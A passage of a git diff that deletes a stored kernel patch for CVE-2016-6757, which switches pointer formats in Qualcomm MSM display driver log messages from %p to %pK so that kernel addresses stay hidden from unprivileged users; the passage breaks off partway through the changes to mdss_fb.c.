--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-6757/3.18/0002.patch b/Patches/Linux_CVEs/CVE-2016-6757/3.18/0002.patch
deleted file mode 100644
index 8edc43e5..00000000
--- a/Patches/Linux_CVEs/CVE-2016-6757/3.18/0002.patch
+++ /dev/null
@@ -1,2368 +0,0 @@
-From f2ba68242d79016cc07b59aa41a67b7a1d36bf9b Mon Sep 17 00:00:00 2001
-From: Abhijit Kulkarni <kabhijit@codeaurora.org>
-Date: Mon, 12 Sep 2016 12:41:53 -0700
-Subject: msm: mdss: hide kernel addresses from unprevileged users
-
-for printing kernel pointers which should be hidden from unprivileged
-users, use %pK which evaluates whether kptr_restrict is set.
-
-CRs-Fixed: 987021
-Change-Id: Ie49eee9478f4657cfb2a994ba60da1ec4c356339
-Signed-off-by: Abhijit Kulkarni <kabhijit@codeaurora.org>
----
- drivers/video/msm/mdss/mdp3.c                     | 16 ++---
- drivers/video/msm/mdss/mdp3_ppp_hwio.c            |  6 +-
- drivers/video/msm/mdss/mdss_compat_utils.c        | 18 ++---
- drivers/video/msm/mdss/mdss_debug.c               |  4 +-
- drivers/video/msm/mdss/mdss_debug_xlog.c          | 14 ++--
- drivers/video/msm/mdss/mdss_dsi.c                 | 28 ++++----
- drivers/video/msm/mdss/mdss_dsi_clk.c             |  6 +-
- drivers/video/msm/mdss/mdss_dsi_host.c            |  2 +-
- drivers/video/msm/mdss/mdss_dsi_panel.c           | 10 +--
- drivers/video/msm/mdss/mdss_fb.c                  | 12 ++--
- drivers/video/msm/mdss/mdss_hdmi_tx.c             |  6 +-
- drivers/video/msm/mdss/mdss_mdp.c                 | 12 ++--
- drivers/video/msm/mdss/mdss_mdp_intf_cmd.c        |  6 +-
- drivers/video/msm/mdss/mdss_mdp_intf_video.c      | 10 +--
- drivers/video/msm/mdss/mdss_mdp_layer.c           |  4 +-
- drivers/video/msm/mdss/mdss_mdp_overlay.c         | 10 +--
- drivers/video/msm/mdss/mdss_mdp_pipe.c            |  4 +-
- drivers/video/msm/mdss/mdss_mdp_pp.c              | 70 +++++++++----------
- drivers/video/msm/mdss/mdss_mdp_pp_cache_config.c | 66 +++++++++---------
- drivers/video/msm/mdss/mdss_mdp_pp_v1_7.c         | 82 +++++++++++------------
- drivers/video/msm/mdss/mdss_mdp_rotator.c         |  6 +-
- drivers/video/msm/mdss/mdss_mdp_util.c            |  9 +--
- drivers/video/msm/mdss/mdss_mdp_wb.c              | 10 +--
- drivers/video/msm/mdss/mdss_util.c                |  2 +-
- drivers/video/msm/mdss/mhl3/mhl_linux_tx.c        |  4 +-
- drivers/video/msm/mdss/mhl3/mhl_supp.c            | 14 ++--
- drivers/video/msm/mdss/mhl3/platform.c            |  8 +--
- drivers/video/msm/mdss/mhl3/si_8620_drv.c         |  4 +-
- drivers/video/msm/mdss/mhl3/si_emsc_hid.c         |  8 +--
- drivers/video/msm/mdss/mhl3/si_mdt_inputdev.c     | 27 ++++----
- drivers/video/msm/mdss/mhl3/si_mhl2_edid_3d.c     | 27 ++++----
- 31 files changed, 253 insertions(+), 252 deletions(-)
-
-diff --git a/drivers/video/msm/mdss/mdp3.c b/drivers/video/msm/mdss/mdp3.c
-index 88e34c3..b5deef6 100644
---- a/drivers/video/msm/mdss/mdp3.c
-+++ b/drivers/video/msm/mdss/mdp3.c
-@@ -1135,7 +1135,7 @@ static int mdp3_res_init(void)
- 
- 	mdp3_res->ion_client = msm_ion_client_create(mdp3_res->pdev->name);
- 	if (IS_ERR_OR_NULL(mdp3_res->ion_client)) {
--		pr_err("msm_ion_client_create() return error (%p)\n",
-+		pr_err("msm_ion_client_create() return error (%pK)\n",
- 				mdp3_res->ion_client);
- 		mdp3_res->ion_client = NULL;
- 		return -EINVAL;
-@@ -1565,7 +1565,7 @@ void mdp3_unmap_iommu(struct ion_client *client, struct ion_handle *handle)
- 	mutex_lock(&mdp3_res->iommu_lock);
- 	meta = mdp3_iommu_meta_lookup(table);
- 	if (!meta) {
--		WARN(1, "%s: buffer was never mapped for %p\n", __func__,
-+		WARN(1, "%s: buffer was never mapped for %pK\n", __func__,
- 				handle);
- 		mutex_unlock(&mdp3_res->iommu_lock);
- 		return;
-@@ -1591,7 +1591,7 @@ static void mdp3_iommu_meta_add(struct mdp3_iommu_meta *meta)
- 		} else if (meta->table > entry->table) {
- 			p = &(*p)->rb_right;
- 		} else {
--			pr_err("%s: handle %p already exists\n", __func__,
-+			pr_err("%s: handle %pK already exists\n", __func__,
- 				entry->handle);
- 			BUG();
- 		}
-@@ -1654,7 +1654,7 @@ static int mdp3_iommu_map_iommu(struct mdp3_iommu_meta *meta,
- 	ret = iommu_map_range(domain, meta->iova_addr + padding,
- 			table->sgl, size, prot);
- 	if (ret) {
--		pr_err("%s: could not map %pa in domain %p\n",
-+		pr_err("%s: could not map %pa in domain %pK\n",
- 			__func__, &meta->iova_addr, domain);
- 			unmap_size = padding;
- 		goto out2;
-@@ -1777,12 +1777,12 @@ int mdp3_self_map_iommu(struct ion_client *client, struct ion_handle *handle,
- 		}
- 	} else {
- 		if (iommu_meta->flags != iommu_flags) {
--			pr_err("%s: hndl %p already mapped with diff flag\n",
-+			pr_err("%s: hndl %pK already mapped with diff flag\n",
- 				__func__, handle);
- 			ret = -EINVAL;
- 			goto out_unlock;
- 		} else if (iommu_meta->mapped_size != iova_length) {
--			pr_err("%s: hndl %p already mapped with diff len\n",
-+			pr_err("%s: hndl %pK already mapped with diff len\n",
- 				__func__, handle);
- 			ret = -EINVAL;
- 			goto out_unlock;
-@@ -1816,7 +1816,7 @@ int mdp3_put_img(struct mdp3_img_data *data, int client)
- 		fdput(data->srcp_f);
- 		memset(&data->srcp_f, 0, sizeof(struct fd));
- 	} else if (!IS_ERR_OR_NULL(data->srcp_dma_buf)) {
--		pr_debug("ion hdl = %p buf=0x%pa\n", data->srcp_dma_buf,
-+		pr_debug("ion hdl = %pK buf=0x%pa\n", data->srcp_dma_buf,
- 							&data->addr);
- 		if (!iclient) {
- 			pr_err("invalid ion client\n");
-@@ -1919,7 +1919,7 @@ done:
- 		data->addr += img->offset;
- 		data->len -= img->offset;
- 
--		pr_debug("mem=%d ihdl=%p buf=0x%pa len=0x%lx\n",
-+		pr_debug("mem=%d ihdl=%pK buf=0x%pa len=0x%lx\n",
- 			img->memory_id, data->srcp_dma_buf,
- 			&data->addr, data->len);
- 
-diff --git a/drivers/video/msm/mdss/mdp3_ppp_hwio.c b/drivers/video/msm/mdss/mdp3_ppp_hwio.c
-index e14abd0..907063c 100644
---- a/drivers/video/msm/mdss/mdp3_ppp_hwio.c
-+++ b/drivers/video/msm/mdss/mdp3_ppp_hwio.c
-@@ -1308,7 +1308,7 @@ int config_ppp_op_mode(struct ppp_blit_op *blit_op)
- 	pr_debug("ROI(x %d,y %d,w %d, h %d) ",
- 		blit_op->src.roi.x, blit_op->src.roi.y,
- 		blit_op->src.roi.width, blit_op->src.roi.height);
--	pr_debug("Addr_P0 %p, Stride S0 %d Addr_P1 %p, Stride S1 %d\n",
-+	pr_debug("Addr_P0 %pK, Stride S0 %d Addr_P1 %pK, Stride S1 %d\n",
- 		blit_op->src.p0, blit_op->src.stride0,
- 		blit_op->src.p1, blit_op->src.stride1);
- 
-@@ -1320,7 +1320,7 @@ int config_ppp_op_mode(struct ppp_blit_op *blit_op)
- 		pr_debug("ROI(x %d,y %d, w  %d, h %d) ",
- 			blit_op->bg.roi.x, blit_op->bg.roi.y,
- 			blit_op->bg.roi.width, blit_op->bg.roi.height);
--		pr_debug("Addr %p, Stride S0 %d	Addr_P1 %p, Stride S1 %d\n",
-+		pr_debug("Addr %pK, Stride S0 %d Addr_P1 %pK, Stride S1 %d\n",
- 			blit_op->bg.p0,	blit_op->bg.stride0,
- 			blit_op->bg.p1,	blit_op->bg.stride1);
- 	}
-@@ -1331,7 +1331,7 @@ int config_ppp_op_mode(struct ppp_blit_op *blit_op)
- 	pr_debug("ROI(x %d,y %d, w %d, h %d) ",
- 		blit_op->dst.roi.x, blit_op->dst.roi.y,
- 		blit_op->dst.roi.width, blit_op->dst.roi.height);
--	pr_debug("Addr %p, Stride S0 %d Addr_P1 %p, Stride S1 %d\n",
-+	pr_debug("Addr %pK, Stride S0 %d Addr_P1 %pK, Stride S1 %d\n",
- 		blit_op->dst.p0, blit_op->dst.stride0,
- 		blit_op->dst.p1, blit_op->dst.stride1);
- 
-diff --git a/drivers/video/msm/mdss/mdss_compat_utils.c b/drivers/video/msm/mdss/mdss_compat_utils.c
-index e883f04..5ad51dd 100644
---- a/drivers/video/msm/mdss/mdss_compat_utils.c
-+++ b/drivers/video/msm/mdss/mdss_compat_utils.c
-@@ -150,7 +150,7 @@ static struct mdp_input_layer32 *__create_layer_list32(
- 			compat_ptr(commit32->commit_v1.input_layers),
- 			sizeof(struct mdp_input_layer32) * layer_count);
- 	if (ret) {
--		pr_err("layer list32 copy from user failed, ptr %p\n",
-+		pr_err("layer list32 copy from user failed, ptr %pK\n",
- 			compat_ptr(commit32->commit_v1.input_layers));
- 		kfree(layer_list32);
- 		ret = -EFAULT;
-@@ -182,7 +182,7 @@ static int __copy_scale_params(struct mdp_input_layer *layer,
- 			sizeof(struct mdp_scale_data));
- 	if (ret) {
- 		kfree(scale);
--		pr_err("scale param copy from user failed, ptr %p\n",
-+		pr_err("scale param copy from user failed, ptr %pK\n",
- 			compat_ptr(layer32->scale));
- 		ret = -EFAULT;
- 	} else {
-@@ -307,7 +307,7 @@ static int __compat_atomic_commit(struct fb_info *info, unsigned int cmd,
- 	ret = copy_from_user(&commit32, (void __user *)argp,
- 		sizeof(struct mdp_layer_commit32));
- 	if (ret) {
--		pr_err("%s:copy_from_user failed, ptr %p\n", __func__,
-+		pr_err("%s:copy_from_user failed, ptr %pK\n", __func__,
- 			(void __user *)argp);
- 		ret = -EFAULT;
- 		return ret;
-@@ -325,7 +325,7 @@ static int __compat_atomic_commit(struct fb_info *info, unsigned int cmd,
- 				compat_ptr(commit32.commit_v1.output_layer),
- 				buffer_size);
- 		if (ret) {
--			pr_err("fail to copy output layer from user, ptr %p\n",
-+			pr_err("fail to copy output layer from user, ptr %pK\n",
- 				compat_ptr(commit32.commit_v1.output_layer));
- 			ret = -EFAULT;
- 			goto layer_list_err;
-@@ -3418,7 +3418,7 @@ static int __copy_layer_igc_lut_data_v1_7(
- 			cfg_payload32,
- 			sizeof(struct mdp_igc_lut_data_v1_7_32));
- 	if (ret) {
--		pr_err("copy from user failed, IGC cfg payload = %p\n",
-+		pr_err("copy from user failed, IGC cfg payload = %pK\n",
- 			cfg_payload32);
- 		ret = -EFAULT;
- 		goto exit;
-@@ -3493,7 +3493,7 @@ static int __copy_layer_hist_lut_data_v1_7(
- 			cfg_payload32,
- 			sizeof(struct mdp_hist_lut_data_v1_7_32));
- 	if (ret) {
--		pr_err("copy from user failed, hist lut cfg_payload = %p\n",
-+		pr_err("copy from user failed, hist lut cfg_payload = %pK\n",
- 			cfg_payload32);
- 		ret = -EFAULT;
- 		goto exit;
-@@ -3565,7 +3565,7 @@ static int __copy_layer_pa_data_v1_7(
- 			cfg_payload32,
- 			sizeof(struct mdp_pa_data_v1_7_32));
- 	if (ret) {
--		pr_err("copy from user failed, pa cfg_payload = %p\n",
-+		pr_err("copy from user failed, pa cfg_payload = %pK\n",
- 			cfg_payload32);
- 		ret = -EFAULT;
- 		goto exit;
-@@ -3707,7 +3707,7 @@ static int __copy_layer_pp_info_pcc_params(
- 			compat_ptr(pp_info32->pcc_cfg_data.cfg_payload),
- 			sizeof(struct mdp_pcc_data_v1_7));
- 		if (ret) {
--			pr_err("compat copy of PCC cfg payload failed, ptr %p\n",
-+			pr_err("compat copy of PCC cfg payload failed, ptr %pK\n",
- 				compat_ptr(
- 				pp_info32->pcc_cfg_data.cfg_payload));
- 			ret = -EFAULT;
-@@ -3741,7 +3741,7 @@ static int __copy_layer_pp_info_params(struct mdp_input_layer *layer,
- 			compat_ptr(layer32->pp_info),
- 			sizeof(struct mdp_overlay_pp_params32));
- 	if (ret) {
--		pr_err("pp info copy from user failed, pp_info %p\n",
-+		pr_err("pp info copy from user failed, pp_info %pK\n",
- 			compat_ptr(layer32->pp_info));
- 		ret = -EFAULT;
- 		goto exit;
-diff --git a/drivers/video/msm/mdss/mdss_debug.c b/drivers/video/msm/mdss/mdss_debug.c
-index a16063b..a2912e6 100644
---- a/drivers/video/msm/mdss/mdss_debug.c
-+++ b/drivers/video/msm/mdss/mdss_debug.c
-@@ -1317,7 +1317,7 @@ static inline struct mdss_mdp_misr_map *mdss_misr_get_map(u32 block_id,
- 		return NULL;
- 	}
- 
--	pr_debug("MISR Module(%d) CTRL(0x%x) SIG(0x%x) intf_base(0x%p)\n",
-+	pr_debug("MISR Module(%d) CTRL(0x%x) SIG(0x%x) intf_base(0x%pK)\n",
- 			block_id, map->ctrl_reg, map->value_reg, intf_base);
- 	return map;
- }
-@@ -1360,7 +1360,7 @@ int mdss_misr_set(struct mdss_data_type *mdata,
- 	bool use_mdp_up_misr = false;
- 
- 	if (!mdata || !req || !ctl) {
--		pr_err("Invalid input params: mdata = %p req = %p ctl = %p",
-+		pr_err("Invalid input params: mdata = %pK req = %pK ctl = %pK",
- 			mdata, req, ctl);
- 		return -EINVAL;
- 	}
-diff --git a/drivers/video/msm/mdss/mdss_debug_xlog.c b/drivers/video/msm/mdss/mdss_debug_xlog.c
-index c9a4073..795ff55 100644
---- a/drivers/video/msm/mdss/mdss_debug_xlog.c
-+++ b/drivers/video/msm/mdss/mdss_debug_xlog.c
-@@ -1,4 +1,4 @@
--/* Copyright (c) 2014-2015, The Linux Foundation. All rights reserved.
-+/* Copyright (c) 2014-2016, The Linux Foundation. All rights reserved.
-  *
-  * This program is free software; you can redistribute it and/or modify
-  * it under the terms of the GNU General Public License version 2 and
-@@ -253,7 +253,7 @@ static void mdss_dump_debug_bus(u32 bus_dump_flag,
- 
- 		if (*dump_mem) {
- 			dump_addr = *dump_mem;
--			pr_info("%s: start_addr:0x%p end_addr:0x%p\n",
-+			pr_info("%s: start_addr:0x%pK end_addr:0x%pK\n",
- 				__func__, dump_addr, dump_addr + list_size);
- 		} else {
- 			in_mem = false;
-@@ -371,7 +371,7 @@ static void mdss_dump_vbif_debug_bus(u32 bus_dump_flag,
- 
- 		if (*dump_mem) {
- 			dump_addr = *dump_mem;
--			pr_info("%s: start_addr:0x%p end_addr:0x%p\n",
-+			pr_info("%s: start_addr:0x%pK end_addr:0x%pK\n",
- 				__func__, dump_addr, dump_addr + list_size);
- 		} else {
- 			in_mem = false;
-@@ -431,7 +431,7 @@ static void mdss_dump_reg(const char *dump_name, u32 reg_dump_flag,
- 
- 		if (*dump_mem) {
- 			dump_addr = *dump_mem;
--			pr_info("%s: start_addr:0x%p end_addr:0x%p reg_addr=0x%p\n",
-+			pr_info("%s: start_addr:0x%pK end_addr:0x%pK reg_addr=0x%pK\n",
- 				dump_name, dump_addr, dump_addr + (u32)len * 16,
- 				addr);
- 		} else {
-@@ -450,7 +450,7 @@ static void mdss_dump_reg(const char *dump_name, u32 reg_dump_flag,
- 		xc = readl_relaxed(addr+0xc);
- 
- 		if (in_log)
--			pr_info("%p : %08x %08x %08x %08x\n", addr, x0, x4, x8,
-+			pr_info("%pK : %08x %08x %08x %08x\n", addr, x0, x4, x8,
- 				xc);
- 
- 		if (dump_addr && in_mem) {
-@@ -486,7 +486,7 @@ static void mdss_dump_reg_by_ranges(struct mdss_debug_base *dbg,
- 			len = get_dump_range(&xlog_node->offset,
- 				dbg->max_offset);
- 			addr = dbg->base + xlog_node->offset.start;
--			pr_debug("%s: range_base=0x%p start=0x%x end=0x%x\n",
-+			pr_debug("%s: range_base=0x%pK start=0x%x end=0x%x\n",
- 				xlog_node->range_name,
- 				addr, xlog_node->offset.start,
- 				xlog_node->offset.end);
-@@ -496,7 +496,7 @@ static void mdss_dump_reg_by_ranges(struct mdss_debug_base *dbg,
- 	} else {
- 		/* If there is no list to dump ranges, dump all registers */
- 		pr_info("Ranges not found, will dump full registers");
--		pr_info("base:0x%p len:0x%zu\n", dbg->base, dbg->max_offset);
-+		pr_info("base:0x%pK len:0x%zu\n", dbg->base, dbg->max_offset);
- 		addr = dbg->base;
- 		len = dbg->max_offset;
- 		mdss_dump_reg((const char *)dbg->name, reg_dump_flag, addr,
-diff --git a/drivers/video/msm/mdss/mdss_dsi.c b/drivers/video/msm/mdss/mdss_dsi.c
-index a39d2f3..6933388 100644
---- a/drivers/video/msm/mdss/mdss_dsi.c
-+++ b/drivers/video/msm/mdss/mdss_dsi.c
-@@ -1185,7 +1185,7 @@ static int mdss_dsi_off(struct mdss_panel_data *pdata, int power_state)
- 	mutex_lock(&ctrl_pdata->mutex);
- 	panel_info = &ctrl_pdata->panel_data.panel_info;
- 
--	pr_debug("%s+: ctrl=%p ndx=%d power_state=%d\n",
-+	pr_debug("%s+: ctrl=%pK ndx=%d power_state=%d\n",
- 		__func__, ctrl_pdata, ctrl_pdata->ndx, power_state);
- 
- 	if (power_state == panel_info->panel_power_state) {
-@@ -1369,7 +1369,7 @@ int mdss_dsi_on(struct mdss_panel_data *pdata)
- 		mdss_dsi_validate_debugfs_info(ctrl_pdata);
- 
- 	cur_power_state = pdata->panel_info.panel_power_state;
--	pr_debug("%s+: ctrl=%p ndx=%d cur_power_state=%d\n", __func__,
-+	pr_debug("%s+: ctrl=%pK ndx=%d cur_power_state=%d\n", __func__,
- 		ctrl_pdata, ctrl_pdata->ndx, cur_power_state);
- 
- 	pinfo = &pdata->panel_info;
-@@ -1547,7 +1547,7 @@ static int mdss_dsi_unblank(struct mdss_panel_data *pdata)
- 				panel_data);
- 	mipi  = &pdata->panel_info.mipi;
- 
--	pr_debug("%s+: ctrl=%p ndx=%d cur_power_state=%d ctrl_state=%x\n",
-+	pr_debug("%s+: ctrl=%pK ndx=%d cur_power_state=%d ctrl_state=%x\n",
- 			__func__, ctrl_pdata, ctrl_pdata->ndx,
- 		pdata->panel_info.panel_power_state, ctrl_pdata->ctrl_state);
- 
-@@ -1618,7 +1618,7 @@ static int mdss_dsi_blank(struct mdss_panel_data *pdata, int power_state)
- 				panel_data);
- 	mipi = &pdata->panel_info.mipi;
- 
--	pr_debug("%s+: ctrl=%p ndx=%d power_state=%d\n",
-+	pr_debug("%s+: ctrl=%pK ndx=%d power_state=%d\n",
- 		__func__, ctrl_pdata, ctrl_pdata->ndx, power_state);
- 
- 	mdss_dsi_clk_ctrl(ctrl_pdata, ctrl_pdata->dsi_clk_handle,
-@@ -1687,7 +1687,7 @@ static int mdss_dsi_post_panel_on(struct mdss_panel_data *pdata)
- 	ctrl_pdata = container_of(pdata, struct mdss_dsi_ctrl_pdata,
- 				panel_data);
- 
--	pr_debug("%s+: ctrl=%p ndx=%d\n", __func__,
-+	pr_debug("%s+: ctrl=%pK ndx=%d\n", __func__,
- 				ctrl_pdata, ctrl_pdata->ndx);
- 
- 	mdss_dsi_clk_ctrl(ctrl_pdata, ctrl_pdata->dsi_clk_handle,
-@@ -1721,7 +1721,7 @@ int mdss_dsi_cont_splash_on(struct mdss_panel_data *pdata)
- 	ctrl_pdata = container_of(pdata, struct mdss_dsi_ctrl_pdata,
- 				panel_data);
- 
--	pr_debug("%s+: ctrl=%p ndx=%d\n", __func__,
-+	pr_debug("%s+: ctrl=%pK ndx=%d\n", __func__,
- 				ctrl_pdata, ctrl_pdata->ndx);
- 
- 	WARN((ctrl_pdata->ctrl_state & CTRL_STATE_PANEL_INIT),
-@@ -2998,8 +2998,8 @@ static int mdss_dsi_get_bridge_chip_params(struct mdss_panel_info *pinfo,
- 	u32 temp_val = 0;
- 
- 	if (!ctrl_pdata || !pdev || !pinfo) {
--		pr_err("%s: Invalid Params ctrl_pdata=%p, pdev=%p\n", __func__,
--			ctrl_pdata, pdev);
-+		pr_err("%s: Invalid Params ctrl_pdata=%pK, pdev=%pK\n",
-+			 __func__, ctrl_pdata, pdev);
- 		rc = -EINVAL;
- 		goto end;
- 	}
-@@ -3321,7 +3321,7 @@ static int mdss_dsi_res_init(struct platform_device *pdev)
- 		mdss_dsi_res->shared_data = devm_kzalloc(&pdev->dev,
- 				sizeof(struct dsi_shared_data),
- 				GFP_KERNEL);
--		pr_debug("%s Allocated shared_data=%p\n", __func__,
-+		pr_debug("%s Allocated shared_data=%pK\n", __func__,
- 				mdss_dsi_res->shared_data);
- 		if (!mdss_dsi_res->shared_data) {
- 			pr_err("%s Unable to alloc mem for shared_data\n",
-@@ -3386,7 +3386,7 @@ static int mdss_dsi_res_init(struct platform_device *pdev)
- 				rc = -ENOMEM;
- 				goto mem_fail;
- 			}
--			pr_debug("%s Allocated ctrl_pdata[%d]=%p\n",
-+			pr_debug("%s Allocated ctrl_pdata[%d]=%pK\n",
- 				__func__, i, mdss_dsi_res->ctrl_pdata[i]);
- 			mdss_dsi_res->ctrl_pdata[i]->shared_data =
- 				mdss_dsi_res->shared_data;
-@@ -3396,7 +3396,7 @@ static int mdss_dsi_res_init(struct platform_device *pdev)
- 	}
- 
- 	mdss_dsi_res->pdev = pdev;
--	pr_debug("%s: Setting up mdss_dsi_res=%p\n", __func__, mdss_dsi_res);
-+	pr_debug("%s: Setting up mdss_dsi_res=%pK\n", __func__, mdss_dsi_res);
- 
- 	return 0;
- 
-@@ -3723,11 +3723,11 @@ int mdss_dsi_retrieve_ctrl_resources(struct platform_device *pdev, int mode,
- 		pr_debug("%s:%d unable to remap dsi phy regulator resources\n",
- 			       __func__, __LINE__);
- 	else
--		pr_info("%s: phy_regulator_base=%p phy_regulator_size=%x\n",
-+		pr_info("%s: phy_regulator_base=%pK phy_regulator_size=%x\n",
- 			__func__, ctrl->phy_regulator_io.base,
- 			ctrl->phy_regulator_io.len);
- 
--	pr_info("%s: ctrl_base=%p ctrl_size=%x phy_base=%p phy_size=%x\n",
-+	pr_info("%s: ctrl_base=%pK ctrl_size=%x phy_base=%pK phy_size=%x\n",
- 		__func__, ctrl->ctrl_base, ctrl->reg_size, ctrl->phy_io.base,
- 		ctrl->phy_io.len);
- 
-@@ -3871,7 +3871,7 @@ static int mdss_dsi_parse_ctrl_params(struct platform_device *ctrl_pdev,
- 	data = of_get_property(ctrl_pdev->dev.of_node,
- 		"qcom,display-id", &len);
- 	if (!data || len <= 0)
--		pr_err("%s:%d Unable to read qcom,display-id, data=%p,len=%d\n",
-+		pr_err("%s:%d Unable to read qcom,display-id, data=%pK,len=%d\n",
- 			__func__, __LINE__, data, len);
- 	else
- 		snprintf(ctrl_pdata->panel_data.panel_info.display_id,
-diff --git a/drivers/video/msm/mdss/mdss_dsi_clk.c b/drivers/video/msm/mdss/mdss_dsi_clk.c
-index bac8391..e92f6df 100644
---- a/drivers/video/msm/mdss/mdss_dsi_clk.c
-+++ b/drivers/video/msm/mdss/mdss_dsi_clk.c
-@@ -732,7 +732,7 @@ int mdss_dsi_clk_req_state(void *client, enum mdss_dsi_clk_type clk,
- 
- 	if (!client || !clk || clk > (MDSS_DSI_CORE_CLK | MDSS_DSI_LINK_CLK) ||
- 	    state > MDSS_DSI_CLK_EARLY_GATE) {
--		pr_err("Invalid params, client = %p, clk = 0x%x, state = %d\n",
-+		pr_err("Invalid params, client = %pK, clk = 0x%x, state = %d\n",
- 		       client, clk, state);
- 		return -EINVAL;
- 	}
-@@ -830,7 +830,7 @@ int mdss_dsi_clk_set_link_rate(void *client, enum mdss_dsi_link_clk_type clk,
- 	struct mdss_dsi_clk_mngr *mngr;
- 
- 	if (!client || (clk > MDSS_DSI_LINK_CLK_MAX)) {
--		pr_err("Invalid params, client = %p, clk = 0x%x", client, clk);
-+		pr_err("Invalid params, client = %pK, clk = 0x%x", client, clk);
- 		return -EINVAL;
- 	}
- 
-@@ -929,7 +929,7 @@ int mdss_dsi_clk_force_toggle(void *client, u32 clk)
- 	struct mdss_dsi_clk_mngr *mngr;
- 
- 	if (!client || !clk || clk >= MDSS_DSI_CLKS_MAX) {
--		pr_err("Invalid params, client = %p, clk = 0x%x\n",
-+		pr_err("Invalid params, client = %pK, clk = 0x%x\n",
- 		       client, clk);
- 		return -EINVAL;
- 	}
-diff --git a/drivers/video/msm/mdss/mdss_dsi_host.c b/drivers/video/msm/mdss/mdss_dsi_host.c
-index 66bbff5..f6fbd66 100644
---- a/drivers/video/msm/mdss/mdss_dsi_host.c
-+++ b/drivers/video/msm/mdss/mdss_dsi_host.c
-@@ -102,7 +102,7 @@ void mdss_dsi_ctrl_init(struct device *ctrl_dev,
- 	if (ctrl->mdss_util->register_irq(ctrl->dsi_hw))
- 		pr_err("%s: mdss_register_irq failed.\n", __func__);
- 
--	pr_debug("%s: ndx=%d base=%p\n", __func__, ctrl->ndx, ctrl->ctrl_base);
-+	pr_debug("%s: ndx=%d base=%pK\n", __func__, ctrl->ndx, ctrl->ctrl_base);
- 
- 	init_completion(&ctrl->dma_comp);
- 	init_completion(&ctrl->mdp_comp);
-diff --git a/drivers/video/msm/mdss/mdss_dsi_panel.c b/drivers/video/msm/mdss/mdss_dsi_panel.c
-index 2428af7..06dc0ec 100644
---- a/drivers/video/msm/mdss/mdss_dsi_panel.c
-+++ b/drivers/video/msm/mdss/mdss_dsi_panel.c
-@@ -721,7 +721,7 @@ static int mdss_dsi_post_panel_on(struct mdss_panel_data *pdata)
- 	ctrl = container_of(pdata, struct mdss_dsi_ctrl_pdata,
- 				panel_data);
- 
--	pr_debug("%s: ctrl=%p ndx=%d\n", __func__, ctrl, ctrl->ndx);
-+	pr_debug("%s: ctrl=%pK ndx=%d\n", __func__, ctrl, ctrl->ndx);
- 
- 	pinfo = &pdata->panel_info;
- 	if (pinfo->dcs_cmd_by_left && ctrl->ndx != DSI_CTRL_LEFT)
-@@ -760,7 +760,7 @@ static int mdss_dsi_panel_off(struct mdss_panel_data *pdata)
- 	ctrl = container_of(pdata, struct mdss_dsi_ctrl_pdata,
- 				panel_data);
- 
--	pr_debug("%s: ctrl=%p ndx=%d\n", __func__, ctrl, ctrl->ndx);
-+	pr_debug("%s: ctrl=%pK ndx=%d\n", __func__, ctrl, ctrl->ndx);
- 
- 	if (pinfo->dcs_cmd_by_left) {
- 		if (ctrl->ndx != DSI_CTRL_LEFT)
-@@ -795,7 +795,7 @@ static int mdss_dsi_panel_low_power_config(struct mdss_panel_data *pdata,
- 	ctrl = container_of(pdata, struct mdss_dsi_ctrl_pdata,
- 				panel_data);
- 
--	pr_debug("%s: ctrl=%p ndx=%d enable=%d\n", __func__, ctrl, ctrl->ndx,
-+	pr_debug("%s: ctrl=%pK ndx=%d enable=%d\n", __func__, ctrl, ctrl->ndx,
- 		enable);
- 
- 	/* Any panel specific low power commands/config */
-@@ -2066,7 +2066,7 @@ static int mdss_dsi_panel_timing_from_dt(struct device_node *np,
- 
- 	if (np->name) {
- 		pt->timing.name = kstrdup(np->name, GFP_KERNEL);
--		pr_info("%s: found new timing \"%s\" (%p)\n", __func__,
-+		pr_info("%s: found new timing \"%s\" (%pK)\n", __func__,
- 				np->name, &pt->timing);
- 	}
- 
-@@ -2400,7 +2400,7 @@ static int mdss_panel_parse_dt(struct device_node *np,
- 		bridge_chip_name = of_get_property(np,
- 			"qcom,bridge-name", &len);
- 		if (!bridge_chip_name || len <= 0) {
--			pr_err("%s:%d Unable to read qcom,bridge_name, data=%p,len=%d\n",
-+			pr_err("%s:%d Unable to read qcom,bridge_name, data=%pK,len=%d\n",
- 				__func__, __LINE__, bridge_chip_name, len);
- 			rc = -EINVAL;
- 			goto error;
-diff --git a/drivers/video/msm/mdss/mdss_fb.c b/drivers/video/msm/mdss/mdss_fb.c
-index 570471d..3b68ee2 100644
---- a/drivers/video/msm/mdss/mdss_fb.c
-+++ b/drivers/video/msm/mdss/mdss_fb.c
-@@ -2029,7 +2029,7 @@ int mdss_fb_alloc_fb_ion_memory(struct msm_fb_data_type *mfd, size_t fb_size)
- 		rc = PTR_ERR(vaddr);
- 		goto err_unmap;
- 	}
--	pr_debug("alloc 0x%zuB vaddr = %p for fb%d\n", fb_size,
-+	pr_debug("alloc 0x%zuB vaddr = %pK for fb%d\n", fb_size,
- 			vaddr, mfd->index);
- 
- 	mfd->fbi->screen_base = (char *) vaddr;
-@@ -2128,7 +2128,7 @@ static int mdss_fb_fbmem_ion_mmap(struct fb_info *info,
- 				vma->vm_page_prot =
- 					pgprot_writecombine(vma->vm_page_prot);
- 
--			pr_debug("vma=%p, addr=%x len=%ld\n",
-+			pr_debug("vma=%pK, addr=%x len=%ld\n",
- 					vma, (unsigned int)addr, len);
- 			pr_debug("vm_start=%x vm_end=%x vm_page_prot=%ld\n",
- 					(unsigned int)vma->vm_start,
-@@ -2295,7 +2295,7 @@ static int mdss_fb_alloc_fbmem_iommu(struct msm_fb_data_type *mfd, int dom)
- 		return -ERANGE;
- 	}
- 
--	pr_debug("alloc 0x%zxB @ (%pa phys) (0x%p virt) (%pa iova) for fb%d\n",
-+	pr_debug("alloc 0x%zxB @ (%pa phys) (0x%pK virt) (%pa iova) for fb%d\n",
- 		 size, &phys, virt, &mfd->iova, mfd->index);
- 
- 	mfd->fbi->screen_base = virt;
-@@ -2583,7 +2583,7 @@ static int mdss_fb_open(struct fb_info *info, int user)
- 	}
- 
- 	mfd->ref_cnt++;
--	pr_debug("mfd refcount:%d file:%p\n", mfd->ref_cnt, info->file);
-+	pr_debug("mfd refcount:%d file:%pK\n", mfd->ref_cnt, info->file);
- 
- 	return 0;
- 
-@@ -2648,7 +2648,7 @@ static int mdss_fb_release_all(struct fb_info *info, bool release_all)
- 		pr_warn("file node not found or wrong ref cnt: release all:%d refcnt:%d\n",
- 			release_all, mfd->ref_cnt);
- 
--	pr_debug("current process=%s pid=%d mfd->ref=%d file:%p\n",
